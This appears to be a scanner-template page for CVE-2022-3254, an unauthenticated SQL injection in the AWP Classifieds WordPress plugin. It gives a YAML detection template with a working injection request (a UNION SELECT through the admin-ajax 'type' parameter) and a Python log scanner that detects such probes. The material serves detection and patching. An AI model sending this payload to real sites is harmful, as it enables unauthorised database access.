
AWP Classifieds <= 4.2.1 - Unauthenticated SQL Injection

CVE-2022-3254
Verified

Description

WordPress Classifieds Plugin before 4.3 contains a SQL injection caused by improper sanitization and escaping of parameters in an AJAX action, letting unauthenticated attackers execute arbitrary SQL commands. Exploitation requires the premium module to be active.

Severity

Critical

Published Date

February 6, 2026

Template Author

shivam kamboj

CVE-2022-3254.yaml
id: CVE-2022-3254

info:
  name: AWP Classifieds <= 4.2.1 - Unauthenticated SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    WordPress Classifieds Plugin before 4.3 contains a SQL injection caused by improper sanitization and escaping of parameters in an AJAX action, letting unauthenticated attackers execute arbitrary SQL commands. Exploitation requires the premium module to be active.
  remediation: |
    Update to version 4.3 or later.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3254
    - https://wpscan.com/vulnerability/546c47c2-5b4b-46db-b754-c6b43aef2660
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "plugins/another-wordpress-classifieds-plugin/"
  tags: cve,cve2022,sqli,wordpress,wp-plugin,awpcp,unauth,wp,vkev

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=awpcp-get-regions-options&context=search&parent_type=country&parent=test&type=id`+FROM+wp_users+WHERE+1=0+UNION+SELECT+VERSION();--+- HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'startswith(trim(body), "{")' # Ensure response is JSON structure
          - 'contains_all(body, "options", "status")'
          - '!contains(body, "\"options\":false")'
          - '!regex(body, "\"options\"\\s*:\\s*\\[\\s*\\]")'
        condition: and
# digest: 4a0a00473045022039b01f894e5ae7efd5f6585ba5fc791b47f973783458b2bacc15ff811049b57a022100d7522a9a5044adc9476aba52b88680f8f5e19ef31da77826020390ca250bc773:922c64590222798bb761d5b6d8e72950
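As an added example (not part of the template above or of the plugin's own code), the following Python scans web-server access logs for requests shaped like the probe the template sends: the vulnerable admin-ajax action with a `type` parameter that is not a plain identifier token. The log lines are constructed, and the allowlist for legitimate `type` values is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (Apache "common" style); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Feb/2026:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=awpcp-get-regions-options&context=search&parent_type=country&parent=test&type=id HTTP/1.1" 200 512
203.0.113.9 - - [06/Feb/2026:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=awpcp-get-regions-options&context=search&parent_type=country&parent=test&type=id%60+FROM+wp_users+WHERE+1=0+UNION+SELECT+VERSION();--+- HTTP/1.1" 200 640
203.0.113.9 - - [06/Feb/2026:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 40
203.0.113.9 - - [06/Feb/2026:10:00:04 +0000] "GET /index.php?type=id%60+UNION HTTP/1.1" 404 10
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
VULN_ACTION = "awpcp-get-regions-options"
# Assumption: legitimate `type` values are short identifier tokens; anything else
# (backticks, spaces, SQL keywords, comment sequences) is treated as suspicious.
SAFE_TYPE = re.compile(r"^[A-Za-z0-9_]+$")


def is_cve_2022_3254_attempt(line):
    """Return True if the log line targets the vulnerable AJAX action with a non-identifier `type`."""
    m = REQUEST_RE.search(line)
    if not m:
        return False
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("action", [""])[0] != VULN_ACTION:
        return False
    # parse_qs already percent-decodes once; decode again to catch double-encoded values.
    for value in qs.get("type", []):
        if not SAFE_TYPE.match(unquote_plus(value)):
            return True
    return False


def scan_log(text):
    """Return (line_number, client_ip) for every flagged request."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        if is_cve_2022_3254_attempt(line):
            hits.append((n, line.split(" ", 1)[0]))
    return hits


if __name__ == "__main__":
    for n, ip in scan_log(SAMPLE_LOG):
        print(f"line {n}: possible CVE-2022-3254 exploitation attempt from {ip}")
```

The allowlist check flags malformed `type` values regardless of the exact SQL used, so it also covers variations of the probe that a keyword blocklist would miss.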
CVSS Score

9.5

References

https://nvd.nist.gov/vuln/detail/CVE-2022-3254
https://wpscan.com/vulnerability/546c47c2-5b4b-46db-b754-c6b43aef2660

Remediation Steps

Update to version 4.3 or later.